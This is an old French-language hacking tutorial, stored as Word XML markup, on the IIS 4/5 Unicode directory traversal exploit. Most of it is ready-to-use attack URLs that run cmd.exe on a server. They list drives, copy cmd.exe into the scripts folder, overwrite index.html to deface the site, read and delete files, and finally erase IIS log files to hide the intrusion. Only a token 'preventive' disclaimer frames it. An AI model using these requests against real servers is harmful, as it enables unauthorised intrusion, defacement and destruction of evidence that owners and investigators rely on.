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fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="arial" w:cs="arial" w:ascii="arial" w:hAnsi="arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Hacking de serveurs web: exploit UNICODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="arial" w:cs="arial" w:ascii="arial" w:hAnsi="arial"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">hacké un serveur web #2: </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">UNICODE EXPLOIT IIS 4 + 5 </w:t>
        <w:br/>
        <w:t xml:space="preserve">a lire avec notepad.exe </w:t>
        <w:br/>
        <w:t xml:space="preserve">Ce texte peut etre reproduit s'il demeure inchangé. </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Par: </w:t>
        <w:br/>
        <w:t xml:space="preserve">QwErTo </w:t>
        <w:br/>
        <w:t xml:space="preserve">d4t4th3f@hotmail.com </w:t>
        <w:br/>
        <w:t xml:space="preserve">Info présenté dans un but préventif, l'auteur n'est pas responsable de vos actes et bla bla </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Merci a THxZ0NE et MrQ </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Matériel requis: </w:t>
        <w:br/>
        <w:t xml:space="preserve">unicodexecute2.pl en combination avec activeperl </w:t>
        <w:br/>
        <w:t xml:space="preserve">ou alors...un web browser =) </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Les utilisateurs de windows devrait se procurer Grinder ou r3x pour scanner les serveurs web. </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">L'adresse ip utilisé pour cette exemple est 127.0.0.1 </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">1- ok, on doit d'abord trouvé un server web pour des fins de vérifications. </w:t>
        <w:br/>
        <w:t xml:space="preserve">on tape ensuite cette commande dans la barre d'adresse de notre web browser: </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">http://127.0.0.1/scripts/..À¯../winnt/system32/cmd.exe?+/c+dir+c:\ </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Si les directions c:/ s'affiche, le serveur est vulnérable. </w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Vous regardez ensuite la direction c:\Inetpub\wwwroot , </w:t>
        <w:br/>
        <w:t xml:space="preserve">vous faites ca de cette facon: </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">http://127.0.0.1/scripts/..À¯../winnt/system32/cmd.exe?+/c+dir+c:\Inetpub\wwwroot </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">On regarde ensuite c:\winnt\system32 </w:t>
        <w:br/>
        <w:t xml:space="preserve">de cette facon: </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">http://127.0.0.1/scripts/..À¯../winnt/system32/cmd.exe?+/c+dir+c:\winnt\system32 </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Si tout est en place, on continue </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">2- on doit ensuite copier cmd.exe de c:\winnt\system32\ vers c:\Inetpub\scripts </w:t>
        <w:br/>
        <w:t xml:space="preserve">vous commencé a comprendre? =) on fait ca avec la commande suivante: </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">http://127.0.0.1/scripts/..À¯../winnt/system32/cmd.exe?+/c+copy+c:\winnt\system32\cmd.exe%20c:\Inetpub\scripts\cmds.exe </w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">si la direction Inetpub/Scripts existe sur une autre partition, exemple e:, on fait: </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">http://127.0.0.1/scripts/..À¯../winnt/system32/cmd.exe?+/c+copy+c:\winnt\system32\cmd.exe%20e:\Inetpub\scripts\cmds.exe </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Lorsque c'est fait, le serveur vous appartient sauf si vous recevez le message "acces is denied", </w:t>
        <w:br/>
        <w:t xml:space="preserve">le serveur a une patch et on doit allé voir ailleur. </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">3- maintenant on part a la recheche du html. Si Inetpub\wwwroot existe sur le c:, on doit aller a: </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">http://127.0.0.1/scripts/..À¯../winnt/system32/cmd.exe?+/c+dir+c:\Inetpub\wwwroot </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">;) </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">ou sur e: (exemple), </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">e:\http://127.0.0.1/scripts/..À¯../winnt/system32/cmd.exe?+/c+dir+e:\Inetpub\wwwroot </w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">4- Lorsque vous voyer le html a "remplacer", exemple index.html, </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">vous devez taper: </w:t>
        <w:br/>
        <w:t xml:space="preserve">http://127.0.0.1/scripts/cmds.exe?+/c+echo+VOTRE TEXTE+&gt;+c:\Inetpub\wwwroot\index.html </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Ce qui écrirais la regle "VOTRE TEXTE" vers index.html </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">taper maintenant http://127.0.0.1/ dans votre browser et vous verez votre texte comme main page =) </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">(profitez en pour ecrire au web master pour qu'il mette son serveur a jour ;) </w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">5- autres trucs intéressant a faire: </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">créé des fichiers: </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">http://127.0.0.1/scripts/..À¯../winnt/system32/cmd.exe?+/c+mkdir+0wn3D_By_QwErTo </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">;) </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">ce prommené vers les disques d e ou f: </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">http://127.0.0.1/scripts/..À¯../winnt/system32/cmd.exe?+/c+dir+d: </w:t>
        <w:br/>
        <w:t xml:space="preserve">http://127.0.0.1/scripts/..À¯../winnt/system32/cmd.exe?+/c+dir+e: </w:t>
        <w:br/>
        <w:t xml:space="preserve">http://127.0.0.1/scripts/..À¯../winnt/system32/cmd.exe?+/c+dir+f: </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">ouvrir un fichier texte dans le serveur, exmple zone.txt </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">http://ip/scripts/..À¯../winnt/system32/cmd.exe?+/c+type+c:\zone.txt </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">autres commandes: </w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">echo: upload </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">dir+c:\ voir les fichiers du disques c:\ </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">del+c:\thxzone.txt effacer thxzone.txt du disque c:\ </w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">ha oui, j'oubliais presque. Lorsque le sevrveur est hacké, vous devez effacer les fichiers logs ;) </w:t>
        <w:br/>
        <w:t xml:space="preserve">Attender quelques minutes (le temps que vos mouvement soit écrit dans les logs) et aller effacer in010323.log a: </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">http://127.0.0.1/cgi- bin/cmd.exe?/c+del+c:/winnt/system32/logfiles/in010323.log </w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">Si ca ne marche pas pour vous, soit le serveur est protégé, n'est pas un serveur windows ou alors vous faites quelques chose de mal et je n'ai aucune idée qu'est ce que ca peut-etre alors pas de email innutile svp. (ou pas du tout de préference) </w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">QwErTo </w:t>
        <w:br/>
        <w:br/>
        <w:b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